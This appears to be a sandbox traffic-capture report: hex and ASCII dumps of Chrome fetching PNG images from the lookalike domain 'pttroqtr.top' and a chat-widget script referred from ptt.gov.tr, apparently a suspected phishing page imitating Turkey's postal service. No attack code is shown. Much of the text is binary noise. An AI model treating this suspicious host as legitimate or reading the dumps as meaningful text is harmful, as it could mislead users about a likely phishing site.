                                                                                                                                                                                            2024-09-28 03:39:39 UTC16384INData Raw: 1c 09 ca 02 fb da fe 97 e0 b6 af fe a6 90 75 77 df e7 c1 ae 7f b4 6a 1b 3c dd 78 26 fc 72 d2 b7 78 db 59 13 cf e3 7d df 57 bf 07 06 e8 13 bc 2f 8b 90 c3 d4 b4 14 e8 c0 3c 62 3d 4e de 97 49 22 bf 1f a6 2d 29 2d af e4 fd 2e 4b a8 45 d3 d7 ea 8a 1a 69 29 29 5c ab 2c d3 9c 1c 0d 90 40 a1 8c e7 e6 64 73 92 e9 8f 22 60 05 89 27 46 ee ea 8d 71 50 34 51 f1 f1 74 88 df 15 dc fb 32 b8 df f9 09 04 42 9d 7d 78 7a 33 24 75 ee f5 ff 00 ed 8e 67 c0 74 ea af 40 37 e5 5c de 5e 5c 32 05 32 32 b3 a1 bd a5 11 0e ee ff 92 11 65 25 f5 08 56 e2 c8 48 4f 8f 5a fb 2d 2b 2c 0c 57 0d 5d af cf 0b 58 ce 2f 56 cf 86 94 27 94 e5 c9 93 26 a6 99 cd e6 1c 46 e2 36 43 ef a0 2e 89 6b c4 3b 92 b7 c5 5c 6b 7c f0 20 bc bf ee 7d de 88 e9 49 fa 94 71 46 ea 3e d9 bc 09 be d8 b3 1b 4e 5a 75 12 4c
                                                                                                                                                                                            Data Ascii: uwj<x&rxY}W/<b=NI"-)-.KEi))\,@ds"`'FqP4Qt2B}xz3$ugt@7\^\222e%VHOZ-+,W]X/V'&F6C.k;\k| }IqF>NZuL
                                                                                                                                                                                            2024-09-28 03:39:39 UTC16384INData Raw: 89 30 79 3d 7c b4 18 1c 84 e4 0a d2 a5 2c 0c df ee 20 09 ac d8 3c 43 98 ee a9 a8 ac a4 ed 5e af 65 f5 9b 35 84 88 8f 1c 3d 1e 72 c8 64 11 6d 2e ce 65 fd da 35 b0 3d ff e4 8a 4f 14 89 0b 22 69 01 f7 ad 5d bd 7a cb a5 97 5d f6 a8 c7 ef df 83 7c 8e 6c 34 58 50 92 37 49 e2 4e 56 32 47 7b 84 d8 e4 07 4c 7c a0 1d f9 cf 6f 85 50 d1 e1 41 7b 7d a8 f7 66 7b e9 bf 91 a4 05 04 0d e2 5e 83 41 dc 36 24 af 8c dc 99 cd 91 f8 2b ec 60 85 1e 59 65 55 15 38 1d 4e b0 58 cc 27 e4 8d c3 63 b6 92 41 cf d5 ea 82 a6 26 46 28 1a 1b 5a c8 2c 3c 8d 74 42 a7 43 ce d0 e8 f9 61 f2 c3 b5 1f ed 87 c2 a3 0d 83 d6 ee a8 f5 f6 e6 e5 63 e8 7b 65 e2 82 b0 3b 9f 38 b4 b1 7b bc 76 64 7c 23 4a f8 ba ba 2f f8 1d ac 45 c9 de ab a1 ae ae 1e dc 3e 1f b1 fb 19 90 96 1e 8d 51 c4 e4 87 5f 6e fc 15 ec
                                                                                                                                                                                            Data Ascii: 0y=|, <C^e5=rdm.e5=O"i]z]|l4XP7INV2G{L|oPA{}f{^A6$+`YeU8NX'cA&F(Z,<tBCac{e;8{vd|#J/E>Q_n
                                                                                                                                                                                            2024-09-28 03:39:39 UTC13491INData Raw: ff 6e 21 04 ee 20 44 25 56 d4 9c 80 84 62 08 5b 48 b1 c5 16 65 8f 25 74 21 05 a9 0b 0f 82 20 7e a5 60 b4 90 a7 31 fb fc 7e da ff 31 81 e4 a8 03 57 08 26 a3 90 f1 ba 0d 9b 40 ab d5 c0 59 67 ce 1a fe d5 f2 55 2e e5 6d 00 99 c0 20 21 21 d1 cf 90 89 0d 12 12 12 12 12 12 12 12 83 10 d2 13 27 21 31 08 a1 58 b6 a3 1e 31 2e 8a 2c bc 4c 08 2f 9f a4 89 84 0f 9f f2 f3 31 af b1 fb 3b 5a 12 1c 30 72 2b c7 01 e5 52 70 5d 4e 66 fa fc 79 3f bc e8 7c dc e1 71 7b 40 a5 52 87 b5 1a b5 4a ab d5 c2 d6 6d f9 54 77 a5 aa a6 c6 b3 71 d3 d6 9d 05 07 0e ac 33 9b cd db 21 ea ae f3 81 4c 60 90 90 90 18 00 90 31 71 12 12 27 11 14 09 1e 4a e1 62 15 b4 bf 34 7a ca c4 72 71 8d 3d 04 26 80 18 6c 26 73 de ec d9 33 2e a6 ec 2e 18 9a 73 f7 6f 7e 35 27 2b 2b 83 56 71 f8 f7 4b af 6e c4 fd 2f
                                                                                                                                                                                            Data Ascii: n! D%Vb[He%t! ~`1~1W&@YgU.m !!'!1X1.,L/1;Z0r+Rp]Nfy?|q{@RJmTwq3!L`1q'Jb4zrq=&l&s3..so~5'++VqKn/


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            112192.168.2.5498398.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:38 UTC361OUTGET /help/layout/images/50.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:39 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:39 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 30380
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"76ac-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:39 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 76 39 49 44 41 54 78 da ec 9d 09 7c 15 d5 d9 ff cf cc dd ef cd be 87 04 12 08 fb 4e 02 84 7d 11 10 14 a1 8a 8a ad 56 da 17 fb 6a ab 6f 6d ab 6f b5 d5 f7 5f 6b 5b ed ab 7d b5 d5 b7 da 57 5b 68 a5 6a 5d 91 7d 91 7d 27 40 20 ec 04 08 24 24 21 fb 7e f7 3b f7 ce 7f ce 99 99 9b 9b 3d 81 90 05 7f df 8f 38 e7 de dc 99 39 73 e6 cc cc 6f 9e e7 9c e7 e1 44 51 24 00 00 00 00 00 a0 77 c1 41 c4 01 00 00 00 00 40 c4 01 00 00 00 00 00 88 38 00 00 00 00 00 00 11 07 00 00 00 00 00 11 07 00 00 00 00
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<v9IDATx|N}Vjomo_k[}W[hj]}}'@ $$!~;=89soDQ$wA@8
                                                                                                                                                                                            2024-09-28 03:39:39 UTC14307INData Raw: 72 88 0c 75 a6 e8 f4 a9 53 57 2e 5d fa 40 b3 a1 43 fe f0 c6 9f d8 98 ab f3 e7 cf cd 0c b2 04 91 b2 b2 f2 df d1 cf 45 45 d7 a5 7e 9d b6 b5 c3 d7 86 c1 60 53 04 ab 3f c3 01 9d 6d 69 32 18 6a ba a2 af 35 7e 31 d2 34 4a 4e df 0e 29 d7 40 53 f4 89 8f 67 22 2e 21 21 7e 95 d4 36 cb e4 47 b0 67 88 24 7c 5a 7c 0e 37 9c 62 ab ba 42 bd 6c bb a3 47 8f 66 f5 b9 70 3e fb c2 49 c7 69 f6 ac 0a 0e 0a 2a 8e 8d 8b 3f d9 f4 85 41 6c e6 35 b2 99 c7 87 57 d4 7a 94 21 1a 54 34 f6 4b ea fb e6 a8 11 23 3e a3 9f e7 cf bf 33 a3 b9 75 be f8 72 f5 e2 3d 7b f6 31 11 c7 73 1a 52 67 b5 c5 6d de bc 85 09 f8 bb ee 5a 90 d1 a5 ba 8a 00 00 00 00 00 80 5e 47 97 5a e2 44 83 f4 86 a4 d1 74 e9 01 72 4c cb d7 6b 70 6f 65 75 72 4f 3c 11 de b2 b2 91 c4 dd 2d b1 02 09 af 24 fb d5 a6 f4 cf e1 a3 a2
                                                                                                                                                                                            Data Ascii: ruSW.]@CEE~`S?mi2j5~14JN)@Sg".!!~6Gg$|Z|7bBlGfp>Ii*?Al5Wz!T4K#>3ur={1sRgmZ^GZDtrLkpoeurO<-$


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            113192.168.2.5498408.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:38 UTC361OUTGET /help/layout/images/51.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:39 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:39 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 23451
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"5b9b-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:39 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 5b 28 49 44 41 54 78 da ec bd 7f 88 63 db 7d e0 79 ae aa c3 e6 85 81 aa c7 fc 31 ed c1 4b cb 79 0f 4c c0 d0 6a c6 2c 31 76 5c 6a 86 90 b0 93 a1 ab 5f 63 9c 64 02 a5 ee f6 1f 5e 70 e8 ea cd 06 ff 88 b3 ad 5e db f9 c1 24 69 35 09 24 7f f8 bd 52 41 c6 b1 d7 74 77 35 c9 2e 33 13 c2 53 39 0e 09 83 e1 55 91 40 30 3c fb a9 20 c4 3d 2c c1 55 30 e4 25 b8 4b 77 ef f7 ea 7b 5a 47 47 e7 4a 57 d2 55 49 aa fa 7c 40 5d 5d 2a 49 f7 de 73 af 74 3e fa 9e 73 be df 28 8e 63 03 00 00 00 00 cb 45 84 c4
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<[(IDATxc}y1KyLj,1v\j_cd^p^$i5$RAtw5.3S9U@0< =,U0%Kw{ZGGJWUI|@]]*Ist>s(cE
                                                                                                                                                                                            2024-09-28 03:39:39 UTC7378INData Raw: 61 79 8c ae a9 e8 65 75 e6 15 4f 42 ec 84 fc e6 12 1c fe 35 7f 3f f5 18 9a 2a 4b f7 f4 f6 a6 77 93 e5 eb 62 6c 5b a6 37 97 ed be de a4 2d cb 76 18 5a e7 c9 b5 1c 51 be 6a ba 73 dd 36 32 e4 c9 56 8a d8 34 bd a1 d4 03 5d 55 5c d6 fb 77 bd f3 51 9b 41 db 34 3d 69 0d 9e 73 e5 50 23 88 b2 ef 77 10 38 00 00 58 64 2e 9c a5 83 51 41 30 26 3b 22 67 27 ea ef 9a e1 93 d5 6d 87 9f 2e 91 17 f9 5b f0 b9 4f 76 a5 a7 2b 51 6e 71 f6 ab ce 9f ac a0 c8 10 8a 1c d3 ee b0 48 a3 53 be 6b 53 9f 73 d3 e6 4e d3 95 b2 0f 32 e6 0f 5a b9 b3 43 bc eb 8e a4 d9 9f 75 d3 9b 2f 77 dd f4 0f ed 4e 8d 4a fb e5 21 12 e7 0f 37 37 54 30 9b 08 1c 00 00 2c 3a a5 b3 76 40 4e 44 ee 38 f0 e7 34 b2 e6 ac d6 74 a9 7a bf b7 3c f9 5b 5b e0 c3 de 55 d9 6c e8 8a d2 2d d3 ab ed d9 d0 b9 7e 47 2a 27 22 70
                                                                                                                                                                                            Data Ascii: ayeuOB5?*Kwbl[7-vZQjs62V4]U\wQA4=isP#w8Xd.QA0&;"g'm.[Ov+QnqHSkSsN2ZCu/wNJ!77T0,:v@ND84tz<[[Ul-~G*'"p


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            114192.168.2.54984235.201.78.444432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:39 UTC635OUTGET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1
                                                                                                                                                                                            Host: pttem.alo-tech.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://www.ptt.gov.tr/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:39 UTC701INHTTP/1.1 200 OK
                                                                                                                                                                                            content-type: application/javascript
                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                            access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Authorization, Tenant
                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains;
                                                                                                                                                                                            x-namespace: pttem.alo-tech.com
                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                            vary: Accept-Language
                                                                                                                                                                                            content-language: tr
                                                                                                                                                                                            referrer-policy: same-origin
                                                                                                                                                                                            cross-origin-opener-policy: same-origin
                                                                                                                                                                                            x-cloud-trace-context: ba6759d17e428e3716433d8b78c4b74c
                                                                                                                                                                                            date: Sat, 28 Sep 2024 03:39:39 GMT
                                                                                                                                                                                            server: Google Frontend
                                                                                                                                                                                            Content-Length: 17555
                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            2024-09-28 03:39:39 UTC689INData Raw: 76 61 72 20 61 63 6a 73 46 75 6c 6c 73 69 7a 65 20 3d 20 66 61 6c 73 65 3b 76 61 72 20 4d 4f 42 49 4c 45 5f 53 43 52 45 45 4e 2c 66 6f 63 75 73 5f 69 6e 74 65 72 76 61 6c 3d 30 2c 61 63 6a 73 5f 6e 65 61 72 5f 6c 65 66 74 3d 21 31 3b 66 75 6e 63 74 69 6f 6e 20 41 6c 6f 43 68 61 74 44 72 61 77 28 74 29 7b 76 61 72 20 65 2c 61 2c 6f 3b 41 6c 6f 43 68 61 74 2e 61 6c 6f 63 68 61 74 5f 70 61 67 65 5f 74 69 74 6c 65 3d 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 2c 41 6c 6f 43 68 61 74 2e 6d 75 74 65 43 68 61 74 3d 21 31 2c 30 3c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 77 69 64 67 65 74 22 29 2e 6c 65 6e 67 74 68 3f 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 63 68 61 74
                                                                                                                                                                                            Data Ascii: var acjsFullsize = false;var MOBILE_SCREEN,focus_interval=0,acjs_near_left=!1;function AloChatDraw(t){var e,a,o;AloChat.alochat_page_title=document.title,AloChat.muteChat=!1,0<document.getElementsByClassName("alotech-chat-widget").length?console.log("chat
                                                                                                                                                                                            2024-09-28 03:39:39 UTC1390INData Raw: 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 6d 61 73 74 65 72 50 61 67 65 43 73 73 5b 22 2e 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 77 69 64 67 65 74 22 5d 2e 66 75 6c 6c 73 69 7a 65 5f 73 74 61 74 75 73 2e 68 65 69 67 68 74 29 2c 22 2e 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 62 6f 64 79 22 69 6e 20 6d 61 73 74 65 72 50 61 67 65 43 73 73 29 26 26 6d 61 73 74 65 72 50 61 67 65 43 73 73 5b 22 2e 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 62 6f 64 79 22 5d 2e 66 75 6c 6c 73 69 7a 65 5f 73 74 61 74 75 73 26 26 6d 61 73 74 65 72 50 61 67 65 43 73 73 5b 22 2e 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 62 6f 64 79 22 5d 2e 66 75 6c 6c 73 69 7a 65 5f 73 74 61 74 75 73 2e 68 65 69 67 68 74 26 26 28 61 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 6d 61 73 74 65 72 50 61 67 65 43 73
                                                                                                                                                                                            Data Ascii: style.height=masterPageCss[".alotech-chat-widget"].fullsize_status.height),".alotech-chat-body"in masterPageCss)&&masterPageCss[".alotech-chat-body"].fullsize_status&&masterPageCss[".alotech-chat-body"].fullsize_status.height&&(a.style.height=masterPageCs
                                                                                                                                                                                            2024-09-28 03:39:39 UTC1390INData Raw: 2b 74 2b 22 3d 22 3b 66 6f 72 28 76 61 72 20 6f 2c 69 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 73 3d 30 3b 73 3c 69 2e 6c 65 6e 67 74 68 3b 73 2b 2b 29 7b 66 6f 72 28 76 61 72 20 6e 3d 69 5b 73 5d 3b 22 20 22 3d 3d 6e 2e 63 68 61 72 41 74 28 30 29 3b 29 6e 3d 6e 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 69 66 28 30 3d 3d 6e 2e 69 6e 64 65 78 4f 66 28 6f 29 29 72 65 74 75 72 6e 20 6e 2e 73 75 62 73 74 72 69 6e 67 28 6f 2e 6c 65 6e 67 74 68 2c 6e 2e 6c 65 6e 67 74 68 29 7d 72 65 74 75 72 6e 22 22 7d 66 75 6e 63 74 69 6f 6e 20 73 65 6e 64 41 6c 6f 54 65 63 68 47 41 45 76 65 6e 74 73 28 74 2c 65 2c 61 2c 6f 2c 69 2c 73 2c 6e 29 7b 22 6f 6e 22 3d 3d 3d 74 26 26 61 6c 6f 54 65 63 68 47 65 74 43 6f 6f 6b 69 65 28 22 5f
                                                                                                                                                                                            Data Ascii: +t+"=";for(var o,i=document.cookie.split(";"),s=0;s<i.length;s++){for(var n=i[s];" "==n.charAt(0);)n=n.substring(1);if(0==n.indexOf(o))return n.substring(o.length,n.length)}return""}function sendAloTechGAEvents(t,e,a,o,i,s,n){"on"===t&&aloTechGetCookie("_
                                                                                                                                                                                            2024-09-28 03:39:39 UTC1390INData Raw: 65 20 69 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 3b 69 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 31 3d 3d 69 2e 72 65 61 64 79 53 74 61 74 65 26 26 65 2e 62 65 66 6f 72 65 53 65 6e 64 28 29 2c 34 3d 3d 69 2e 72 65 61 64 79 53 74 61 74 65 26 26 28 65 2e 63 6f 6d 70 6c 65 74 65 28 69 2c 69 2e 73 74 61 74 75 73 29 2c 32 30 30 3d 3d 69 2e 73 74 61 74 75 73 7c 7c 30 3d 3d 69 2e 73 74 61 74 75 73 3f 65 2e 73 75 63 63 65 73 73 28 4a 53 4f 4e 2e 70 61 72 73 65 28 69 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 29 29 3a 28 65 2e 65 72 72 6f 72 28 69 2e 73 74 61 74 75 73 29 2c 76 6f 69 64 20 30 21 3d 3d 65 2e 73 74 61 74 75 73 43 6f 64 65 5b 69 2e 73 74 61 74 75 73 5d 26 26 65 2e 73 74 61 74 75 73 43 6f
                                                                                                                                                                                            Data Ascii: e i=new XMLHttpRequest;i.onreadystatechange=function(){1==i.readyState&&e.beforeSend(),4==i.readyState&&(e.complete(i,i.status),200==i.status||0==i.status?e.success(JSON.parse(i.responseText)):(e.error(i.status),void 0!==e.statusCode[i.status]&&e.statusCo
                                                                                                                                                                                            2024-09-28 03:39:39 UTC1390INData Raw: 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 74 29 7d 61 2b 3d 22 26 70 61 67 65 5f 6f 72 69 67 69 6e 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 29 3b 76 61 72 20 6f 2c 69 3d 6e 75 6c 6c 2c 74 3d 6e 75 6c 6c 3b 69 66 28 65 2e 73 63 68 65 64 75 6c 65 64 5f 61 75 74 6f 5f 73 74 61 72 74 26 26 28 74 68 69 73 2e 73 63 68 65 64 75 6c 65 64 5f 61 75 74 6f 5f 73 74 61 72 74 3d 65 2e 73 63 68 65 64 75 6c 65 64 5f 61 75 74 6f 5f 73 74 61 72 74 2c 74 68 69 73 2e 73 63 68 65 64 75 6c 65 64 5f 61 75 74 6f 5f 73 74 61 72 74 5f 6e 61 6d 65 3d 65 2e 63 6c 69 65 6e 74 5f 6e 61 6d 65 2c 74 68 69 73 2e 73 63 68 65 64 75 6c 65 64 5f 61 75 74 6f 5f 73 74 61 72 74 5f 65 6d 61 69 6c 3d 65 2e 63
                                                                                                                                                                                            Data Ascii: {console.log(t)}a+="&page_origin="+encodeURIComponent(window.location.origin);var o,i=null,t=null;if(e.scheduled_auto_start&&(this.scheduled_auto_start=e.scheduled_auto_start,this.scheduled_auto_start_name=e.client_name,this.scheduled_auto_start_email=e.c
                                                                                                                                                                                            2024-09-28 03:39:39 UTC1390INData Raw: 69 66 72 61 6d 65 3d 7b 73 72 63 3a 22 68 74 74 70 73 3a 2f 2f 22 2b 74 2b 22 2f 63 6f 6e 74 65 6e 74 2f 22 2b 65 2e 63 75 73 74 6f 6d 69 7a 65 64 5f 68 74 6d 6c 2b 22 3f 22 2b 61 7d 3a 74 68 69 73 2e 69 66 72 61 6d 65 3d 7b 73 72 63 3a 22 68 74 74 70 73 3a 2f 2f 22 2b 74 2b 22 2f 63 6f 6e 74 65 6e 74 2f 73 70 61 2e 68 74 6d 6c 3f 22 2b 61 7d 7d 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 2c 68 3d 64 6f 63 75 6d 65 6e 74 2e 55 52 4c 3b 6c 65 74 20 6c 3d 21 31 2c 63 3d 21 31 3b 66 6f 72 28 63 75 72 55 52 4c 20 6f 66 5b 22 61 6c 6f 2d 74 65 63 68 2e 63 6f 6d 22 2c 22 63 61 6c 6c 63 65 6e 74 65 72 73 74 75 64 69 6f 2e 63 6f 6d 22 2c 22 6d 75 73 74 65 72 69 68 69 7a 6d 65 74 6c 65 72 69 2e 63 6f 6d 22 5d 29 68 26 26 30 3c 3d 68 2e 69
                                                                                                                                                                                            Data Ascii: iframe={src:"https://"+t+"/content/"+e.customized_html+"?"+a}:this.iframe={src:"https://"+t+"/content/spa.html?"+a}}var n=document.referrer,h=document.URL;let l=!1,c=!1;for(curURL of["alo-tech.com","callcenterstudio.com","musterihizmetleri.com"])h&&0<=h.i
                                                                                                                                                                                            2024-09-28 03:39:39 UTC1390INData Raw: 5f 67 65 74 48 65 69 67 68 74 28 65 2e 77 69 64 67 65 74 48 65 69 67 68 74 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 70 78 22 29 2c 61 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 63 68 61 74 5f 67 65 74 57 69 64 74 68 28 65 2e 77 69 64 67 65 74 57 69 64 74 68 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 70 78 22 29 2c 4d 4f 42 49 4c 45 5f 53 43 52 45 45 4e 26 26 28 73 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28 22 72 69 67 68 74 22 2c 22 30 70 78 22 2c 22 69 6d 70 6f 72 74 61 6e 74 22 29 2c 73 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28 22 62 6f 74 74 6f 6d 22 2c 22 30 70 78 22 2c 22 69 6d 70 6f 72 74 61 6e 74 22 29 2c 61 63 6a 73 5f 6e 65 61 72 5f 6c 65 66 74 26 26 73 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28 22 6c 65 66 74 22
                                                                                                                                                                                            Data Ascii: _getHeight(e.widgetHeight.toString()+"px"),a.style.width=chat_getWidth(e.widgetWidth.toString()+"px"),MOBILE_SCREEN&&(s.style.setProperty("right","0px","important"),s.style.setProperty("bottom","0px","important"),acjs_near_left&&s.style.setProperty("left"
                                                                                                                                                                                            2024-09-28 03:39:39 UTC1390INData Raw: 28 29 7b 73 2e 73 74 79 6c 65 2e 62 6f 78 53 68 61 64 6f 77 3d 22 30 70 78 20 30 70 78 20 35 70 78 20 30 70 78 20 23 38 38 38 38 38 38 64 36 22 7d 2c 34 30 30 29 29 2c 22 6d 61 78 69 6d 69 73 65 22 3d 3d 3d 65 2e 63 68 61 6e 67 65 54 79 70 65 3f 28 73 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 63 68 61 74 5f 67 65 74 48 65 69 67 68 74 28 65 2e 77 69 64 67 65 74 48 65 69 67 68 74 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 70 78 22 29 2c 73 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 63 68 61 74 5f 67 65 74 57 69 64 74 68 28 65 2e 77 69 64 67 65 74 57 69 64 74 68 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 70 78 22 29 2c 61 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 63 68 61 74 5f 67 65 74 48 65 69 67 68 74 28 65 2e 77 69 64 67 65 74 48 65 69 67 68 74 2e 74 6f 53 74 72 69
                                                                                                                                                                                            Data Ascii: (){s.style.boxShadow="0px 0px 5px 0px #888888d6"},400)),"maximise"===e.changeType?(s.style.height=chat_getHeight(e.widgetHeight.toString()+"px"),s.style.width=chat_getWidth(e.widgetWidth.toString()+"px"),a.style.height=chat_getHeight(e.widgetHeight.toStri
